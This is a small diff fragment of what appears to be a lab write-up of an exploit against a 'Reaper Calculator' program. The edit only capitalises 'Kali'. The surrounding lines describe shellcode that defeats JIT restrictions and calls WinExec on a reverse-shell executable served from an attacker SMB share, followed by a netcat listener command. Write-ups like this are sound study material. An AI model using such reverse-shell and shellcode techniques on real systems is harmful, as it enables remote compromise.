plackyhacker/plackyhacker.github.io/walkthrough/reaper2.md

     jmp 0x1c                        ; this is to defeat the JIT restrictions
 ```

 - Pushes a string on the stack.
-This is an SMB share on my kali host, with a reverse shell executable.
+This is an SMB share on my Kali host, with a reverse shell executable.
 - Calls `WinExec` using 64-bit calling conventions.

-I set up a **SMB** share on my kali host.
+I set up a **SMB** share on my Kali host.
 I hosted a reverse shell and executed my final JavaScript exploit in the Reaper Calculator:

 ```
 nc -nvlp 4443